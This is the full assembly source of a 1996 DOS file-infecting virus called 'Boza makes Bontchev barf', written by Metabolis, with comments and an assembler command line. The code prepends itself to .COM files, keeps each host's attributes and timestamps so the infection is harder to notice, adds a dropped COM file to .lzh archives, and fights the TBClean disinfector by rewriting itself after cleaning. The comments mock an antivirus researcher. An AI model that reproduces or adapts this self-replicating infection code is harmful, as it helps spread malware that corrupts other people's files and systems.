; ; "Boza makes Bontchev barf" ; by Metabolis. ; ; ; When the virus is tbcleaned and run it will print either.. ; ; "Bad command or filename" ; if port 40h holds a value ; ; lower than 0d2h. ; or ; ; "Call this virus what you will. ; if it's higher. ; Boza still makes Bontchev barf :P" ; ; The virus will then fix itself so if the user is stupid enough ; to run it again it will keep infecting. (Well, in a sense they're ; not stupid, after all.. the file will work again, damn destructive ; tbclean :) ; ; If there are any .lzh files in the current directory the virus will ; add a small com file to them all. (note: it doesn't check if the ; archives have already been added to, so it just adds the file again, ; no harm.. just takes up more precious hdd space I guess) ; ; Files larger than 0fab0h, smaller than 1002, CO as the first two ; characters, starting with 0e9h,00,00 or with numbers in the filename ; won't be infected. ; ; I'm sure there is a lot of code here that could be optimized. ; It's lucky I don't care :) ; ; a86 bmbb.asm ; org 100h star: db 0e9h,00,00 ; jump along mov bx,0FECEh ; initialize tbclean check mov word ptr [101h],(die-star)-3 ; move the address of "die" mov ax,100h ; to 101h then jump there. jmp ax ; it then jumps to die. db " 'Boza makes Bontchev Barf' by Metabolis " ; when the virus is tbcleaned (tbclean never did handle ; prependers correctly.) it gets written back to disk ; with the jump to die still at 100h, so if bx ain't FECE ; it has been cleaned. counter db 00h die: mov word ptr[101h],0000h ; fix initial jump. cmp bx,0FECEh ; we been cleaned? je keepgoin ; no, keep going. in al,40h ; grab us a number cmp al,0d2h ; compare al to 210 jb badcom ; below? mov dx,offset barf ; boza makes bontchev barf. jmp print badcom: mov dx,offset badcomm ; bad command or filename. print: mov ah,9 ; display stuph from ds:dx int 21h push ds ; we'll be needing this mov si,word ptr[2ch] ; get env seg from psp push si pop ds ; change ds to env seg xor bp,bp loopme: mov bx,word ptr ds:[bp] ; grab a byte from env inc bp cmp bx,0000h jne loopme inc bp mov bx,word ptr ds:[bp] cmp bx,0001h jne loopme inc bp inc bp mov ax,3d01h ; open the current file mov dx,bp int 21h xchg ax,bx ; the usual. pop ds mov ah,40h ; write 3 bytes that will mov cx,3 ; fix the virus back up. mov dx,star int 21h mov ah,3eh ; close file int 21h mov ax,4c00h ; time to retreat. int 21h keepgoin: mov byte ptr[counter],00h mov ah,1Ah mov dx,word ptr[total] ; relocate the dta int 21h ; to the very end of the virus ; (plus infectee length) findfirst: mov ah,4eh mov cx,7 ; find first file mov dx,offset fmask int 21h jnc checks ; no error? check it out. jmp returnhost checks: mov bp,word ptr[total] ; put filesize in cx mov cx,word ptr[bp+1ah] cmp cx,0fab0h ; too big? ja findn cmp cx,1002 ; too small? jb findn cmp word ptr[bp+1eh],'OC' ; command.com? je findn mov si,bp mov cx,8 xor ax,ax looptime: cmp byte ptr [si+1eh],30h ; this routine checks to jb cont ; see if there are any cmp byte ptr [si+1eh],39h ; numbers in the filename ja cont ; of the infectee. jmp findn cont: inc si loop looptime mov ax,4301h lea dx,[bp+1eh] ; fix up the attributes mov cx,20h ; to nothing incase the int 21h ; file is read only or jc findn ; something. mov ax,3d02; ; open file for read/write lea dx,[bp+1eh] int 21h jnc fixhandle jmp fn fixhandle: xchg bx,ax mov ah,03fh ; read 3 bytes from file mov cx,3 ; put in temp mov dx,offset temp int 21h cmp word ptr[temp],00e9h ; file infected? je fn mov cx,word ptr[temp] add cl,ch cmp cl,167 ; an incognito EXE? je fn jmp pushups findn: jmp findnext ; damn jumps > 128 :| sof: mov ax,4200h ; seek to the beginning cwd ; of the file xor cx,cx int 21h ret pushups: call sof mov ah,03fh mov cx,en-star ; read start of infectee mov dx,word ptr[total] ; and put it after the add dx,42 ; relocated DTA mov si,dx int 21h mov cx,word ptr[total] ; could probably push mov word ptr[temp],cx ; word ptr [total] heh mov cx,word ptr[bp+1ah] add cx,100h ; fix up the new total add cx,(en-star) ; file length of the infectee mov word ptr[total],cx ; (+100h) call sof mov ah,40h mov cx,en-star ; write virus to file mov dx,star int 21h mov cx,word ptr[temp] ; restore total mov word ptr[total],cx mov ax,4202h ; seek to end of file call sof+3 mov ah,40h ; write the overwritten mov cx,en-star ; infectee code to the lea dx,[si] ; end of the file. int 21h jc fn inc byte ptr[counter] ; increment that infect cntr. fn: mov cl,byte ptr[bp+15h] ; restore original lea dx,[bp+1eh] ; attributes to the file mov ax,4301h int 21h mov cx,word ptr[bp+16h] ; restore date and time mov dx,word ptr[bp+18h] mov ax,5701h int 21h mov ah,3eh ; close file int 21h findnext: cmp byte ptr[counter],1 ; infected a file? je returnhost ; yea, we out. mov ah,4fh ; find another file. int 21h jc returnhost jmp checks ; open it up returnhost: lzhtime: mov ah,4eh mov cx,7 ; find first lzh mov dx,offset fmask2 int 21h jc audi openlzh: mov ax,3d01h lea dx,[bp+1eh] ; open it up for write axs int 21h xchg ax,bx ; fix the file handle mov ax,4201h ; goto eof-1 mov dx,word ptr[bp+1ah] dec dx xor cx,cx int 21h mov ah,40h ; write the lzh header mov cx,enddump-dump mov dx,offset dump int 21h mov ah,3eh ; close the file int 21h mov ah,4fh ; find another file. int 21h jc audi ; error? .. we out jmp openlzh audi: mov ah, 1ah mov dx, 80h ; DTA back to 80h int 21h mov si,offset proced mov di,word ptr[total] ; move the return to host mov cx,proceden-proced ; code to the end of rep movsb ; everything so it doesn't mov ax,word ptr[total] ; get overwritten. jmp ax proced: mov si,word ptr[total] sub si,en-star ; put everything back at mov di,100h ; 100h like it should be. mov cx,en-star rep movsb mov ax,100h ; ribbit. jmp ax proceden: barf db "Call this virus what you will.",0dh,0ah db "Boza still makes Bontchev barf :P$" dump: db 31,68,45,108,104,53,45,98,0,0,0 ; a useless com file db 109,0,0,0,118,90,91,32,32,1,6 db 66,66,46,67,79,77,24,170,77,0,0 db 0,99,82,118,174,39,3,52,69,6,127 db 240,96,208,247,128,204,12,79,185,191,195 db 77,93,80,188,189,225,67,11,79,124,30 db 227,56,0,20,184,187,245,221,57,235,200 db 199,186,135,111,132,82,2,149,108,146,150 db 60,218,70,210,92,204,140,163,65,237,156 db 225,125,177,35,189,173,35,83,26,185,24 db 141,13,5,115,111,231,84,144,223,70,238 db 139,227,11,252,154,39,168,118,158,192,0 enddump: badcomm db "Bad command or file name",0dh,0ah,"$" fmask db "*.c?m",00h fmask2 db "*.lzh",00h temp db 00,00,00 total dw ((en-star)*2)+100h en: host: ; our little host program mov ah,9 mov dx,0109h int 21h int 20h db "Did you really want to run this?",0dh,0ah db "Metabolis - 1996","$"